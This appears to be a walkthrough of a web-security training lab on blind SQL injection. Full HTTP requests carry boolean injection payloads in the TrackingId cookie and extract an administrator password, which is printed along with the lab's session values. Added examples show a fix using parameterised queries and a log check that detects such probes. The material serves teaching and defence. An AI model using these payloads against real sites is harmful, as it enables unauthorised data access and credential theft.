Blind SQL injection with conditional responses
Solution
Check whether the TrackingId cookie is vulnerable
Append a single quote (') to the cookie value
GET /product?productId=3 HTTP/2
Host: 0a51000803534e2a828b25bb001300b8.web-security-academy.net
Cookie: TrackingId=TNrzF4hwXlqGpFvk'; session=qAV2CzyzU4bEvrbmqm96Z3fScbOV5bKE
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a51000803534e2a828b25bb001300b8.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Confirm that there is a table called users
GET /product?productId=4 HTTP/2
Host: 0ab100b90475d203800eb71c001c0038.web-security-academy.net
Cookie: TrackingId=LpcsNXPBz0yHypL7' AND (SELECT 'a' FROM users LIMIT 1)='a; session=9pfK98d8TvLsFwoDqmeaTOa1EifBuJO1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab100b90475d203800eb71c001c0038.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Confirm that there is a user called administrator
GET /product?productId=4 HTTP/2
Host: 0ab100b90475d203800eb71c001c0038.web-security-academy.net
Cookie: TrackingId=LpcsNXPBz0yHypL7' AND (SELECT 'a' FROM users WHERE username='administrator')='a; session=9pfK98d8TvLsFwoDqmeaTOa1EifBuJO1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab100b90475d203800eb71c001c0038.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Check how long the password is
The password is 20 characters
Enumerate lengths from 1 to 20 characters
---
GET /product?productId=4 HTTP/2
Host: 0ab100b90475d203800eb71c001c0038.web-security-academy.net
Cookie: TrackingId=LpcsNXPBz0yHypL7' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>19)='a; session=9pfK98d8TvLsFwoDqmeaTOa1EifBuJO1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab100b90475d203800eb71c001c0038.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
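The three requests above work because the cookie value is spliced straight into the SQL text. The example below is added here and is not part of the write-up or the lab's code: it models the TrackingId lookup on an in-memory SQLite database, once with the cookie concatenated into the query (vulnerable) and once as a bound parameter (fixed), then replays the write-up's own probe values against both forms. The table names, the sample rows and the 20-character sample password are constructed; the lab's real schema is not known.

```python
"""Added example, not part of the write-up or the lab code: it models the
TrackingId lookup the lab performs on an in-memory SQLite database, first
with the cookie spliced into the SQL text (vulnerable) and then as a bound
parameter (fixed), and replays the write-up's own probe values against both.
Sample data is constructed; the lab's real schema and values are unknown."""
import sqlite3

# Constructed sample rows: the table/column names mirror the ones the
# write-up probes (users.username, users.password); the values are made up.
SAMPLE_USERS = [("administrator", "example-pass-20chars"), ("wiener", "peter")]
SAMPLE_TRACKING_IDS = ["LpcsNXPBz0yHypL7"]

# Probe values copied from the write-up's Cookie headers (the last one is the
# same length probe with the threshold raised by one).
PROBE_QUOTE = "LpcsNXPBz0yHypL7'"
PROBE_TABLE_EXISTS = "LpcsNXPBz0yHypL7' AND (SELECT 'a' FROM users LIMIT 1)='a"
PROBE_LEN_GT_19 = ("LpcsNXPBz0yHypL7' AND (SELECT 'a' FROM users "
                   "WHERE username='administrator' AND LENGTH(password)>19)='a")
PROBE_LEN_GT_20 = PROBE_LEN_GT_19.replace(">19", ">20")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE tracking (id TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO tracking VALUES (?)",
                     [(t,) for t in SAMPLE_TRACKING_IDS])
    return conn


def lookup_vulnerable(conn, tracking_id):
    """Vulnerable form: the cookie value becomes part of the SQL text, so a
    quote in it closes the literal and everything after it is parsed as SQL."""
    sql = "SELECT id FROM tracking WHERE id = '" + tracking_id + "'"
    return conn.execute(sql).fetchone() is not None


def lookup_fixed(conn, tracking_id):
    """Fixed form: the value is bound as a parameter and can only be compared
    as data, so quotes and keywords inside it change nothing."""
    sql = "SELECT id FROM tracking WHERE id = ?"
    return conn.execute(sql, (tracking_id,)).fetchone() is not None


def probe(conn, lookup, tracking_id):
    """Reduce the outcome to the three things the response can reveal:
    'row' (the conditional content is shown), 'no-row', or 'error'."""
    try:
        return "row" if lookup(conn, tracking_id) else "no-row"
    except sqlite3.Error:
        return "error"


def demo():
    """Run every probe against both forms; returns {probe_name: (vuln, fixed)}."""
    conn = make_db()
    probes = {
        "legit": "LpcsNXPBz0yHypL7",
        "quote": PROBE_QUOTE,
        "table_exists": PROBE_TABLE_EXISTS,
        "len_gt_19": PROBE_LEN_GT_19,
        "len_gt_20": PROBE_LEN_GT_20,
    }
    return {name: (probe(conn, lookup_vulnerable, v), probe(conn, lookup_fixed, v))
            for name, v in probes.items()}


if __name__ == "__main__":
    for name, (vuln, fixed) in demo().items():
        print(f"{name:14} vulnerable={vuln:7} fixed={fixed}")
```

Against the vulnerable form the bare quote raises a syntax error and the two LENGTH probes flip between "row" and "no-row" at exactly the sample password's length, which is the oracle the write-up relies on; against the parameterised form every probe simply fails to match a tracking id, so the response never depends on the injected condition.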
Enumerate the password using Intruder
Use Intruder with the "Cluster bomb" attack type
First we have to set up "Grep - Match"
---
GET /product?productId=4 HTTP/2
Host: 0ab100b90475d203800eb71c001c0038.web-security-academy.net
Cookie: TrackingId=LpcsNXPBz0yHypL7' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a; session=9pfK98d8TvLsFwoDqmeaTOa1EifBuJO1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab100b90475d203800eb71c001c0038.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
Password for user administrator is: 4n9jtka5tq6dlgfke7t4
Log in as user: administrator
L: administrator
P: 4n9jtka5tq6dlgfke7t4
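From the defending side, the Intruder step above leaves a distinctive trail: one session sending many requests whose TrackingId is no longer a plain token but carries quotes and SQL. The script below is an added example, not part of the write-up, showing a simple log check for that pattern. It assumes a constructed access-log format that records the Cookie header, and it assumes (from the values seen in the write-up) that a legitimate TrackingId is 16 alphanumeric characters; both are assumptions, and the log lines are constructed.

```python
"""Added example, not part of the write-up: a small log check a defender can
run to spot the probing this lab walks through. It assumes (constructed) access
logs that record the Cookie header, and that a legitimate TrackingId is 16
alphanumeric characters, which is what the write-up's own values look like."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed log lines; the TrackingId values mirror the write-up's probes
# (percent-encoded as a browser or proxy would send them).
SAMPLE_LOG = """\
2024-06-01T12:00:01Z 10.0.0.5 GET /product?productId=4 cookie="TrackingId=LpcsNXPBz0yHypL7; session=sessA"
2024-06-01T12:00:02Z 10.0.0.5 GET /product?productId=4 cookie="TrackingId=LpcsNXPBz0yHypL7%27; session=sessA"
2024-06-01T12:00:03Z 10.0.0.5 GET /product?productId=4 cookie="TrackingId=LpcsNXPBz0yHypL7%27%20AND%20(SELECT%20%27a%27%20FROM%20users%20LIMIT%201)=%27a; session=sessA"
2024-06-01T12:00:04Z 10.0.0.5 GET /product?productId=4 cookie="TrackingId=LpcsNXPBz0yHypL7%27%20AND%20(SELECT%20SUBSTRING(password,1,1)%20FROM%20users%20WHERE%20username=%27administrator%27)=%27a; session=sessA"
2024-06-01T12:00:05Z 10.0.0.9 GET /product?productId=2 cookie="TrackingId=TNrzF4hwXlqGpFvk; session=sessB"
"""

# Assumed legitimate format (16 alphanumerics, as in the write-up's cookies).
TRACKING_ID_OK = re.compile(r"^[A-Za-z0-9]{16}$")
# Fragments characteristic of boolean-condition probes like the ones above.
SQLI_FRAGMENT = re.compile(
    r"'\s*(AND|OR)\s*\(?\s*SELECT\b|\b(SUBSTRING|LENGTH)\s*\(", re.IGNORECASE)
COOKIE_FIELD = re.compile(r'cookie="([^"]*)"')
BURST_THRESHOLD = 3  # flagged requests per session before we call it enumeration


def parse_cookies(header):
    """'k=v; k2=v2' -> dict with percent-decoded values."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = unquote(value)
    return cookies


def analyse(log_text):
    """Return (findings, bursty_sessions).

    findings: [(line_no, reason)] for every request whose TrackingId fails the
    format allowlist; reason is 'sqli-fragment' when it also carries SQL syntax.
    bursty_sessions: session cookies with >= BURST_THRESHOLD flagged requests,
    the signature of Intruder-style character-by-character extraction.
    """
    findings = []
    per_session = Counter()
    for line_no, line in enumerate(log_text.splitlines(), 1):
        match = COOKIE_FIELD.search(line)
        if not match:
            continue
        cookies = parse_cookies(match.group(1))
        tracking_id = cookies.get("TrackingId")
        if tracking_id is None or TRACKING_ID_OK.match(tracking_id):
            continue
        reason = "sqli-fragment" if SQLI_FRAGMENT.search(tracking_id) else "malformed-trackingid"
        findings.append((line_no, reason))
        per_session[cookies.get("session", "<none>")] += 1
    bursty = sorted(s for s, n in per_session.items() if n >= BURST_THRESHOLD)
    return findings, bursty


if __name__ == "__main__":
    found, bursts = analyse(SAMPLE_LOG)
    for line_no, reason in found:
        print(f"line {line_no}: {reason}")
    print("sessions enumerating:", bursts)
```

The format allowlist does the real work: a cookie that the application itself rejects before it reaches the database closes the channel regardless of what the SQL keyword regex catches, so the same check belongs in the application as input validation, with parameterised queries behind it. The keyword regex and the per-session burst count are only there to rank which sessions to look at first.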